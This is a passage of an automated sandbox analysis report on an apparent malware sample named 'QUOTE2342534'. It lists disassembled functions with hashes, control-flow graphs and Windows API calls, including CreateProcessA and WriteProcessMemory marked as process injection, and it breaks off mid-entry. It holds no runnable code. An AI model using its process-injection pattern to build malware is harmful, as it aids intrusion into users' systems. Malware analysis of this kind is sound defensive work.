                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3a2c6d6aa6cab91dea900bceb6a0c8f77d9ec4efa806db342f87e28851e7378d
                                                                                                                                                                                                                                                • Instruction ID: f7b2b56a1f88240064890ee1828e45cd93a7381825d62c5f344b5257dd2137bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a2c6d6aa6cab91dea900bceb6a0c8f77d9ec4efa806db342f87e28851e7378d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52429074E01219CFDB58DFA9C984B9DBBB6FF48301F2091A9E909A7355D730AA81CF50
                                                                                                                                                                                                                                                Function 0EF41B88 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2158731559.000000000EF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EF40000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef40000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 039f2f6c06385aa7f7f26587af61660fa8f14e304ba28e2136b5e2d36731ef78
                                                                                                                                                                                                                                                • Instruction ID: d7d82554155b5332b958da6ce6e6012e54e9cb1b66d4b533aaaa4fca4d4dba04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 039f2f6c06385aa7f7f26587af61660fa8f14e304ba28e2136b5e2d36731ef78
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BC1A1B1B026088FD719EB75C460B6EBBFAAF89700F14846DD24A9B395DB34E841CB51
                                                                                                                                                                                                                                                Function 089F33FC Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5c44f8dc3736ed9b2a78690aea5b76d4b584536a80f0e33ba2550728d5751d1d
                                                                                                                                                                                                                                                • Instruction ID: 3534f332d74303e73fdf60e9dd9198cbf28f2a875707bc531b878794c2bcce0a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c44f8dc3736ed9b2a78690aea5b76d4b584536a80f0e33ba2550728d5751d1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71617775E002099FCF09DFA9D8849FEBBF6EF89311F10842AE915A7255DB349906CB90
                                                                                                                                                                                                                                                Function 089F0006 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d2b4801e92262765eeffd754721cf13a8d53162e3d1857856307fe133be52b9b
                                                                                                                                                                                                                                                • Instruction ID: 807c935078001e9b92551b40fe87ef13781d6d64946392d5582750d015983e4c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2b4801e92262765eeffd754721cf13a8d53162e3d1857856307fe133be52b9b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B71F674E05258CFDB19CF69C984BDDBBB2BF89301F1481AAE408AB3A6D7349945CF50
                                                                                                                                                                                                                                                Function 089F5020 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2832ff2c72defe6f511292e90e2c4fce77f3cbf6b35704cdacd850aa27ba4a89
                                                                                                                                                                                                                                                • Instruction ID: 9a8a7300882b450438c9081ebdba0601e5a04cd8a556f61c2acf6d4e72780f4b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2832ff2c72defe6f511292e90e2c4fce77f3cbf6b35704cdacd850aa27ba4a89
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF51C271E002189FDB08DFE6C8446EEBBB2FF89301F14802AE919AB255DB345906CF50
                                                                                                                                                                                                                                                Function 089F5012 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bfa5e6ff7de18f6170bbe06eb805a76599b5612b10381af740cc4496e47e75e8
                                                                                                                                                                                                                                                • Instruction ID: ae37015501c4f716556ab852c3251130f9cd0de7da651c417491df7ed8b33a51
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfa5e6ff7de18f6170bbe06eb805a76599b5612b10381af740cc4496e47e75e8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED41B371E006599FDB08DFEAC8846EEFBF2AF89301F14C06AD518AB255DB345946CF50
                                                                                                                                                                                                                                                Function 089F8C22 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 335faabb6f023e339172fe244873c422c9a11d6ce4045c6e0bea41aacad8ad5c
                                                                                                                                                                                                                                                • Instruction ID: dfb1d62a4243e39cb5959c0ecd4c44201689ff701020dc9e0f68fea697e56dfa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 335faabb6f023e339172fe244873c422c9a11d6ce4045c6e0bea41aacad8ad5c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4021D4B0D08219CFDB48DF96C8442EEBFB6BF89302F14D43AD60AA6256DB344546CF40
                                                                                                                                                                                                                                                Function 089F8B62 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7a1f48bf0e3a9a9ddd25d8a6c53d112d485144101d913984d965f993a3043367
                                                                                                                                                                                                                                                • Instruction ID: 7b3c97fefc0936e672d67b7cfc865f440a4bbd75e04c89b58223e4574874ffe8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a1f48bf0e3a9a9ddd25d8a6c53d112d485144101d913984d965f993a3043367
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 852124B0D046198BDB48CFA6C9443EEFFF6AF89301F14D47AC50AB6265DB7405468F90
                                                                                                                                                                                                                                                Function 089F8B70 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ee7e002ee169dfdcee559ebdd6ed36828d55a75ad9aab752a7245bf3b2acd5d1
                                                                                                                                                                                                                                                • Instruction ID: dc463ee173bb449828143ac18379f7d9af72ea1b4c19ded9575ae5698dbdaece
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee7e002ee169dfdcee559ebdd6ed36828d55a75ad9aab752a7245bf3b2acd5d1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD21FFB0D046188BEB48DF9AC8443EEBAFAAFC9301F14C43AD50A76265DB7005468B90
                                                                                                                                                                                                                                                Function 00EFD3C9 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 295 efd3c9-efd467 GetCurrentProcess 299 efd469-efd46f 295->299 300 efd470-efd4a4 GetCurrentThread 295->300 299->300 301 efd4ad-efd4e1 GetCurrentProcess 300->301 302 efd4a6-efd4ac 300->302 303 efd4ea-efd505 call efd5a8 301->303 304 efd4e3-efd4e9 301->304 302->301 308 efd50b-efd53a GetCurrentThreadId 303->308 304->303 309 efd53c-efd542 308->309 310 efd543-efd5a5 308->310 309->310
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EFD456
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00EFD493
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EFD4D0
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00EFD529
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                • Opcode ID: 120a388f9828bdca44586444db694eaad35cefbef0257dcb3b842d422c7e57d5
                                                                                                                                                                                                                                                • Instruction ID: 3fc926354c4fd88a77e9496e017562e3262d7e72b6f3bf0f20afa92c58ed5278
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 120a388f9828bdca44586444db694eaad35cefbef0257dcb3b842d422c7e57d5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F35168B0900349CFDB04DFA9D9487AEBFF2EF89304F24C459D519A72A0D7746984CB66
                                                                                                                                                                                                                                                Function 00EFD3D8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 317 efd3d8-efd467 GetCurrentProcess 321 efd469-efd46f 317->321 322 efd470-efd4a4 GetCurrentThread 317->322 321->322 323 efd4ad-efd4e1 GetCurrentProcess 322->323 324 efd4a6-efd4ac 322->324 325 efd4ea-efd505 call efd5a8 323->325 326 efd4e3-efd4e9 323->326 324->323 330 efd50b-efd53a GetCurrentThreadId 325->330 326->325 331 efd53c-efd542 330->331 332 efd543-efd5a5 330->332 331->332
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EFD456
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00EFD493
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00EFD4D0
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00EFD529
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                • Opcode ID: a865fd49cfc66fdfd45442267fa4dd6b4e90d8de5a98002f846732a685bbe546
                                                                                                                                                                                                                                                • Instruction ID: 442378b137b2a510ffb55cb869a3dec367dd90bd305550aa47c1fad7e02fa027
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a865fd49cfc66fdfd45442267fa4dd6b4e90d8de5a98002f846732a685bbe546
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 235167B09003098FDB14DFA9D948BAEBFF6EF88304F20C459E519A7250D774A984CB66
                                                                                                                                                                                                                                                Function 089FE934 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 405 89fe934-89fe9d5 407 89fea0e-89fea2e 405->407 408 89fe9d7-89fe9e1 405->408 415 89fea67-89fea96 407->415 416 89fea30-89fea3a 407->416 408->407 409 89fe9e3-89fe9e5 408->409 410 89fea08-89fea0b 409->410 411 89fe9e7-89fe9f1 409->411 410->407 413 89fe9f5-89fea04 411->413 414 89fe9f3 411->414 413->413 417 89fea06 413->417 414->413 422 89feacf-89feb89 CreateProcessA 415->422 423 89fea98-89feaa2 415->423 416->415 418 89fea3c-89fea3e 416->418 417->410 420 89fea61-89fea64 418->420 421 89fea40-89fea4a 418->421 420->415 424 89fea4e-89fea5d 421->424 425 89fea4c 421->425 436 89feb8b-89feb91 422->436 437 89feb92-89fec18 422->437 423->422 427 89feaa4-89feaa6 423->427 424->424 426 89fea5f 424->426 425->424 426->420 428 89feac9-89feacc 427->428 429 89feaa8-89feab2 427->429 428->422 431 89feab6-89feac5 429->431 432 89feab4 429->432 431->431 434 89feac7 431->434 432->431 434->428 436->437 447 89fec1a-89fec1e 437->447 448 89fec28-89fec2c 437->448 447->448 449 89fec20 447->449 450 89fec2e-89fec32 448->450 451 89fec3c-89fec40 448->451 449->448 450->451 452 89fec34 450->452 453 89fec42-89fec46 451->453 454 89fec50-89fec54 451->454 452->451 453->454 457 89fec48 453->457 455 89fec66-89fec6d 454->455 456 89fec56-89fec5c 454->456 458 89fec6f-89fec7e 455->458 459 89fec84 455->459 456->455 457->454 458->459 461 89fec85 459->461 461->461
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 089FEB76
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                • Opcode ID: ca4524b8e617eb9db138fb1878f7d1e88d39c095411d98eaab30e195e1046c07
                                                                                                                                                                                                                                                • Instruction ID: 71d3fceffe81cd5b97a987efa317216a4db1c3b97f4b4334e59283a3cbd46715
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca4524b8e617eb9db138fb1878f7d1e88d39c095411d98eaab30e195e1046c07
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1A17B71D00219CFDB24DF68CC41BEEBBB6BF48305F14856AE908AB291DB749985CF91
                                                                                                                                                                                                                                                Function 089FE940 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 462 89fe940-89fe9d5 464 89fea0e-89fea2e 462->464 465 89fe9d7-89fe9e1 462->465 472 89fea67-89fea96 464->472 473 89fea30-89fea3a 464->473 465->464 466 89fe9e3-89fe9e5 465->466 467 89fea08-89fea0b 466->467 468 89fe9e7-89fe9f1 466->468 467->464 470 89fe9f5-89fea04 468->470 471 89fe9f3 468->471 470->470 474 89fea06 470->474 471->470 479 89feacf-89feb89 CreateProcessA 472->479 480 89fea98-89feaa2 472->480 473->472 475 89fea3c-89fea3e 473->475 474->467 477 89fea61-89fea64 475->477 478 89fea40-89fea4a 475->478 477->472 481 89fea4e-89fea5d 478->481 482 89fea4c 478->482 493 89feb8b-89feb91 479->493 494 89feb92-89fec18 479->494 480->479 484 89feaa4-89feaa6 480->484 481->481 483 89fea5f 481->483 482->481 483->477 485 89feac9-89feacc 484->485 486 89feaa8-89feab2 484->486 485->479 488 89feab6-89feac5 486->488 489 89feab4 486->489 488->488 491 89feac7 488->491 489->488 491->485 493->494 504 89fec1a-89fec1e 494->504 505 89fec28-89fec2c 494->505 504->505 506 89fec20 504->506 507 89fec2e-89fec32 505->507 508 89fec3c-89fec40 505->508 506->505 507->508 509 89fec34 507->509 510 89fec42-89fec46 508->510 511 89fec50-89fec54 508->511 509->508 510->511 514 89fec48 510->514 512 89fec66-89fec6d 511->512 513 89fec56-89fec5c 511->513 515 89fec6f-89fec7e 512->515 516 89fec84 512->516 513->512 514->511 515->516 518 89fec85 516->518 518->518
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 089FEB76
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                • Opcode ID: 141787e347fc4689051eb46e742e2f052dd35bdbba9772ff739183a48e935db8
                                                                                                                                                                                                                                                • Instruction ID: 68e3347261117d64db8bb1d8cff603dfa868a8f8b607e6757a869248dcfaa599
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 141787e347fc4689051eb46e742e2f052dd35bdbba9772ff739183a48e935db8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA917B71D00219CFDB24DF68CC41BEDBBB6BF48305F14856AE908AB291DB749985CF91
                                                                                                                                                                                                                                                Function 00EFAD48 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 519 efad48-efad57 520 efad59-efad66 call ef9374 519->520 521 efad83-efad87 519->521 528 efad7c 520->528 529 efad68 520->529 522 efad9b-efaddc 521->522 523 efad89-efad93 521->523 530 efadde-efade6 522->530 531 efade9-efadf7 522->531 523->522 528->521 577 efad6e call efafd1 529->577 578 efad6e call efafe0 529->578 530->531 532 efae1b-efae1d 531->532 533 efadf9-efadfe 531->533 535 efae20-efae27 532->535 536 efae09 533->536 537 efae00-efae07 call efa0b0 533->537 534 efad74-efad76 534->528 538 efaeb8-efaf32 534->538 539 efae29-efae31 535->539 540 efae34-efae3b 535->540 542 efae0b-efae19 536->542 537->542 569 efaf36-efaf5e 538->569 570 efaf34 538->570 539->540 543 efae3d-efae45 540->543 544 efae48-efae4a call efa0c0 540->544 542->535 543->544 548 efae4f-efae51 544->548 550 efae5e-efae63 548->550 551 efae53-efae5b 548->551 552 efae65-efae6c 550->552 553 efae81-efae8e 550->553 551->550 552->553 555 efae6e-efae7e call efa0d0 call efa0e0 552->555 559 efaeb1-efaeb7 553->559 560 efae90-efaeae 553->560 555->553 560->559 571 efaf60-efaf78 569->571 570->569 570->571 572 efaf7a-efaf7d 571->572 573 efaf80-efafab GetModuleHandleW 571->573 572->573 574 efafad-efafb3 573->574 575 efafb4-efafc8 573->575 574->575 577->534 578->534
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00EFAF9E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                • Opcode ID: cabbe5d4af61d1f2ab534a072b1ee7a25155a6b2968400f7cf0beffc0a356daf
                                                                                                                                                                                                                                                • Instruction ID: 17da786129805b02332e2e046f280427677c5efaa3296594a65815783390d6ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cabbe5d4af61d1f2ab534a072b1ee7a25155a6b2968400f7cf0beffc0a356daf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC8169B0A00B098FDB24DF69D14576ABBF1FF88304F04892DD58AEBA50D735E945CB92
                                                                                                                                                                                                                                                Function 00EF590C Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 579 ef590c-ef590e 580 ef5912 579->580 581 ef5910 579->581 582 ef5916 580->582 583 ef5914 580->583 581->580 585 ef5918-ef59d9 CreateActCtxA 582->585 583->582 584 ef58b2-ef58d9 583->584 588 ef58db-ef58e1 584->588 589 ef58e2-ef5903 584->589 590 ef59db-ef59e1 585->590 591 ef59e2-ef5a3c 585->591 588->589 590->591 599 ef5a3e-ef5a41 591->599 600 ef5a4b-ef5a4f 591->600 599->600 601 ef5a51-ef5a5d 600->601 602 ef5a60 600->602 601->602 603 ef5a61 602->603 603->603
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00EF59C9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: 36a7258990198c49343d46d493e6acaaed950f336a834c80dc09134ce764968c
                                                                                                                                                                                                                                                • Instruction ID: f92859ffb4194bd56547faa0bd1e7721616b7a16a5eab1553c920f52193a6a9e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36a7258990198c49343d46d493e6acaaed950f336a834c80dc09134ce764968c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D5123B1C00B1DCEDB24CFA9C8447AEBBF5BF48304F20806AD218AB255C7B56945CF91
                                                                                                                                                                                                                                                Function 00EF44F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 713 ef44f0-ef59d9 CreateActCtxA 716 ef59db-ef59e1 713->716 717 ef59e2-ef5a3c 713->717 716->717 724 ef5a3e-ef5a41 717->724 725 ef5a4b-ef5a4f 717->725 724->725 726 ef5a51-ef5a5d 725->726 727 ef5a60 725->727 726->727 728 ef5a61 727->728 728->728
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00EF59C9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: 00f17e8cc13a539c32dd62f51d7d57445d5b0412c26e92b3254b31daa829dc80
                                                                                                                                                                                                                                                • Instruction ID: d0287aeef0ed85d39514de574c33b689fea5fcf2a027de0b8c5cd7ad54b71ce7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00f17e8cc13a539c32dd62f51d7d57445d5b0412c26e92b3254b31daa829dc80
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 544113B1C00B1DCBDB24CFA9C884B9DBBB5BF49304F20816AD508AB255DBB55945CF90
                                                                                                                                                                                                                                                Function 089FE6B1 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 730 89fe6b1-89fe706 732 89fe708-89fe714 730->732 733 89fe716-89fe755 WriteProcessMemory 730->733 732->733 735 89fe75e-89fe78e 733->735 736 89fe757-89fe75d 733->736 736->735
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 089FE748
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                • Opcode ID: bc964ed65baef36023e0396c3c62f8ff7487b059ba7d30391a01077ee4e08115
                                                                                                                                                                                                                                                • Instruction ID: d0b017fcd491415ff99304cb1e40c36a448d03a5a523e08c48f2816759a54544
